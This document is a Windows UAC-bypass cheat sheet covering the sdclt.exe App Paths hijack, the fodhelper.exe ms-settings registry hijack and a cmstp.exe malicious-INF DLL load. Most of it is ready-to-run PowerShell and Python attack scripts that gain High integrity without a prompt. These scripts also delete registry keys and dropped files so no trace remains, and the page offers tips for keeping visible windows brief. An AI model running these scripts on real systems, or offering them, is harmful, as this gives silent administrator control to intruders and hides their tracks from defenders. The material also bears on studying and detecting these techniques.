Bypass UAC

Prerequisites

  • A medium integrity process: the filtered (non-elevated) token a member of Administrators gets at logon
  • The user must be a member of the Administrators group; a plain standard user only gets a credential prompt, not silent elevation
  • UAC at its default level ("Notify me only when apps try to make changes"); auto-elevation is disabled when UAC is set to "Always notify"
  • The abused Windows executable must be signed with a Microsoft code signing certificate
  • The abused Windows executable must be located in a secure directory (\Windows\System32 or \Program Files)
  • The abused Windows executable must also specify the autoElevate property in its manifest
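The following PowerShell script is an added example (not part of the original notes) that checks each prerequisite above from the session you intend to elevate from. The binary to inspect is a parameter; its default, sdclt.exe, is one of the binaries covered below. It assumes `whoami.exe` is available and that `Get-AuthenticodeSignature` can see catalog signatures (Windows 8 and later).

```powershell
# Added example: verify the UAC-bypass preconditions listed above.
param(
    [string]$Binary = "$env:SystemRoot\System32\sdclt.exe"   # assumption: binary to inspect
)

# 1. Integrity level of this process: the bypasses on this page start from Medium.
$label     = (whoami /groups | Select-String 'Mandatory Label') -join ''
$integrity = if ($label -match 'High') { 'High' } elseif ($label -match 'Medium') { 'Medium' } else { 'Other' }

# 2. Administrators membership vs. elevation. In a filtered token the Administrators
#    SID is still listed (deny-only), so membership is true while IsInRole() is false:
#    exactly the state an auto-elevate bypass needs.
$identity = [Security.Principal.WindowsIdentity]::GetCurrent()
$adminSid = [Security.Principal.SecurityIdentifier]'S-1-5-32-544'
$inAdmins = [bool]($identity.Groups | Where-Object { $_ -eq $adminSid })
$elevated = ([Security.Principal.WindowsPrincipal]$identity).IsInRole(
                [Security.Principal.WindowsBuiltInRole]::Administrator)

# 3. UAC policy. EnableLUA=1 means UAC is on. ConsentPromptBehaviorAdmin: 5 = default
#    (prompt only for non-Windows binaries), 0 = never prompt, 2 = Always notify (no auto-elevation).
$pol = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$autoElevateEnabled = ($pol.EnableLUA -eq 1) -and
                      (($pol.ConsentPromptBehaviorAdmin -eq 5) -or ($pol.ConsentPromptBehaviorAdmin -eq 0))

# 4. The binary itself: Microsoft signature, secure directory, autoElevate in its manifest.
$sig        = Get-AuthenticodeSignature -FilePath $Binary
$signedByMs = ($sig.Status -eq 'Valid') -and ($sig.SignerCertificate.Subject -match 'Microsoft')
$secureDir  = ($Binary -like "$env:SystemRoot\System32\*") -or ($Binary -like "$env:ProgramFiles\*")
# The manifest is an RT_MANIFEST resource stored as plain UTF-8 XML, so a text search is a
# sufficient quick check (sigcheck -m gives the full manifest if you have Sysinternals).
$text        = [Text.Encoding]::UTF8.GetString([IO.File]::ReadAllBytes($Binary))
$autoElevate = $text -match '<autoElevate[^>]*>\s*true\s*</autoElevate>'

[pscustomobject]@{
    Binary              = $Binary
    IntegrityLevel      = $integrity
    InAdministrators    = $inAdmins
    AlreadyElevated     = $elevated
    AutoElevateEnabled  = $autoElevateEnabled
    SignedByMicrosoft   = $signedByMs
    InSecureDirectory   = $secureDir
    ManifestAutoElevate = $autoElevate
    Candidate           = ($integrity -eq 'Medium') -and $inAdmins -and (-not $elevated) -and
                          $autoElevateEnabled -and $signedByMs -and $secureDir -and $autoElevate
}
```

If Candidate comes back false, look at which field failed: AlreadyElevated means there is nothing to bypass, AutoElevateEnabled false means UAC is at "Always notify" and none of the techniques below will work.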

SDCLT

  • sdclt.exe is a Microsoft binary that lets the user perform backup and restore operations (Backup and Restore Center)
  • Its manifest sets autoElevate to true, so from a medium-integrity administrator session it starts at High integrity without a prompt:
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <application xmlns="urn:schemas-microsoft-com:asm.v3">
    <windowsSettings>
      <dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
      <autoElevate xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</autoElevate>
    </windowsSettings>
  </application>
</assembly>

App Path

  • The backup and restore function that sdclt.exe opens is part of the Control Panel, so on start sdclt.exe launches control.exe
  • It resolves control.exe through the App Paths registry key and queries the per-user key first: HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe
  • HKCU is writable from medium integrity, so create that key with its (default) value set to the payload
  • then run sdclt.exe
  • the payload starts as a High-integrity (administrator) process without a UAC prompt
  • later Windows 10 builds no longer honour this lookup, so check the target build first
  • all the steps can be done with a PowerShell script (enigma0x3's Invoke-AppPathBypass):

    Invoke-AppPathBypass -payload "C:\Windows\system32\cmd.exe"
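The same hijack done by hand, as an added example (this is not Invoke-AppPathBypass and not from the original notes), so each registry step is visible. The payload path is a parameter; the cleanup step and the 3-second wait are this example's own choices.

```powershell
# Added example: App Paths hijack of control.exe, launched through auto-elevating sdclt.exe.
param(
    [string]$Payload = "$env:SystemRoot\System32\cmd.exe"   # assumption: program to run elevated
)

$appPath = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe'

# sdclt.exe resolves control.exe through the per-user App Paths key before the machine-wide one.
# The (default) value of that key is the program it will launch.
New-Item -Path $appPath -Force | Out-Null
Set-ItemProperty -Path $appPath -Name '(default)' -Value $Payload

# Start the auto-elevating binary; it spawns $Payload at High integrity with no UAC prompt.
Start-Process "$env:SystemRoot\System32\sdclt.exe"

# Give sdclt.exe a moment to spawn the payload, then remove the artifact so nothing is left behind.
Start-Sleep -Seconds 3
Remove-Item -Path $appPath -Force

# Verify from the new window: "whoami /groups" should list "High Mandatory Level".
```

If no window appears, the build has likely been fixed; confirm with Process Monitor that sdclt.exe still reads the HKCU App Paths key before trying another technique.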

Manage Optional Features

  • fodhelper.exe (Features On Demand helper, the "Manage optional features" dialog) is a Microsoft-signed binary in System32
  • Its manifest has autoElevate set to true
  • On start it opens the ms-settings: protocol handler, and the shell looks the ProgID up under HKCU\Software\Classes before the machine-wide HKEY_CLASSES_ROOT entry, so a per-user key wins
  • Registry keys to create:

HKCU:\Software\Classes\ms-settings\shell\open\command
HKCU:\Software\Classes\ms-settings\shell\open\command\DelegateExecute

  • Set DelegateExecute to an empty string (so the shell falls back to the command line instead of a COM handler) and the (default) value to the command to run
  • Then execute fodhelper.exe: the command runs as a High-integrity process and no UAC prompt appears
  • The whole procedure can be scripted; PowerShell and Python versions follow

PowerShell

function FodhelperBypass {
    Param (
        # Command line to run at High integrity
        [String]$program = "cmd /c start powershell.exe" #default
    )

    # Create the per-user ms-settings ProgID that the shell resolves before the machine-wide one
    New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force | Out-Null
    # An empty DelegateExecute makes the shell fall back to the (default) command line
    New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force | Out-Null
    Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $program -Force

    # Perform the bypass: fodhelper auto-elevates and launches the hijacked handler
    Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden

    # Remove the registry structure once the payload has had time to start
    Start-Sleep 3
    Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
}

Python

import os
import sys
import time
import ctypes
import winreg

CMD = r"C:\Windows\System32\cmd.exe"
FOD_HELPER = r"C:\Windows\System32\fodhelper.exe"
PYTHON_CMD = "python"
# Per-user ProgID for the ms-settings: protocol; the shell consults HKCU before HKLM.
REG_PATH = r"Software\Classes\ms-settings\shell\open\command"
DELEGATE_EXEC_REG_KEY = "DelegateExecute"


def is_running_as_admin():
    """Return True if the current token is elevated, False otherwise."""
    try:
        return bool(ctypes.windll.shell32.IsUserAnAdmin())
    except Exception:
        return False


def create_reg_key(name, value):
    """Create the ms-settings command key if needed and set REG_SZ value `name`.

    name=None sets the key's (Default) value.
    """
    winreg.CreateKey(winreg.HKEY_CURRENT_USER, REG_PATH)
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, REG_PATH, 0, winreg.KEY_WRITE) as key:
        winreg.SetValueEx(key, name, 0, winreg.REG_SZ, value)


def remove_reg_key():
    """Delete the hijacked ProgID tree (deepest key first) so no artifact remains."""
    for sub in (r"Software\Classes\ms-settings\shell\open\command",
                r"Software\Classes\ms-settings\shell\open",
                r"Software\Classes\ms-settings\shell",
                r"Software\Classes\ms-settings"):
        try:
            winreg.DeleteKey(winreg.HKEY_CURRENT_USER, sub)
        except OSError:
            pass


def bypass_uac(cmd):
    """Point the ms-settings handler at `cmd`.

    An empty DelegateExecute makes the shell fall back to the (Default)
    command line, which fodhelper.exe then runs elevated.
    """
    create_reg_key(DELEGATE_EXEC_REG_KEY, "")
    create_reg_key(None, cmd)


def execute():
    if is_running_as_admin():
        print("[+] The script is running with administrative privileges!")
        return

    print("[!] The script is NOT running with administrative privileges")
    print("[+] Trying to bypass the UAC")
    try:
        # Re-launch this same script via cmd.exe so the elevated copy hits the admin branch above.
        script = os.path.realpath(__file__)
        cmd = '{} /k {} "{}"'.format(CMD, PYTHON_CMD, script)
        bypass_uac(cmd)
        os.system(FOD_HELPER)
        time.sleep(3)  # let fodhelper spawn the payload before cleaning up
    except OSError:
        sys.exit(1)
    finally:
        remove_reg_key()
    sys.exit(0)


if __name__ == "__main__":
    execute()

CMSTP

  • cmstp.exe is the Microsoft Connection Manager Profile Installer: Microsoft-signed, located in System32, and auto-elevating
  • craft a malicious INF file to pass to cmstp.exe; the RegisterOCXs directive below makes the elevated cmstp process load the listed DLL and call its DllRegisterServer export
[version]
Signature=$chicago$
AdvancedINF=2.5

; Install section cmstp runs; RegisterOCXs registers (loads) the DLLs in the named section
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection

; Each DLL listed here is loaded by the elevated cmstp.exe and its DllRegisterServer is called
[RegisterOCXSection]
C:\Users\kth\Downloads\test.dll

[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Klab"
ShortSvcName="Klab"
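An added example (not from the original notes) that writes the INF above to disk with the DLL path filled in and hands it to cmstp.exe. The DLL and INF paths are parameters; the DLL must export DllRegisterServer, since that is what RegisterOCXs invokes. The `/au` invocation is the one used in the public write-ups of this technique.

```powershell
# Added example: build the INF shown above and launch it through cmstp.exe.
param(
    [Parameter(Mandatory)][string]$DllPath,          # assumption: DLL exporting DllRegisterServer
    [string]$InfPath = "$env:TEMP\cmstp.inf"          # assumption: where to write the INF
)

# Single-quoted here-string so $chicago$ is not expanded by PowerShell.
$inf = @'
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection

[RegisterOCXSection]
__DLL__

[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Klab"
ShortSvcName="Klab"
'@

# String .Replace() rather than -replace, so backslashes in the path are taken literally.
$inf = $inf.Replace('__DLL__', $DllPath)

# cmstp reads the INF as plain text; write it without a BOM.
[IO.File]::WriteAllText($InfPath, $inf, [Text.Encoding]::ASCII)

# cmstp.exe auto-elevates and processes the install section of the profile, loading the DLL
# from the High-integrity process with no UAC prompt.
Start-Process "$env:SystemRoot\System32\cmstp.exe" -ArgumentList '/au', "`"$InfPath`""

# Clean up the dropped INF once cmstp has had time to parse it.
Start-Sleep -Seconds 3
Remove-Item -Path $InfPath -Force
```

Note that cmstp may briefly show its profile-installation dialog; a DLL whose DllRegisterServer spawns the real payload and returns quickly keeps that window short.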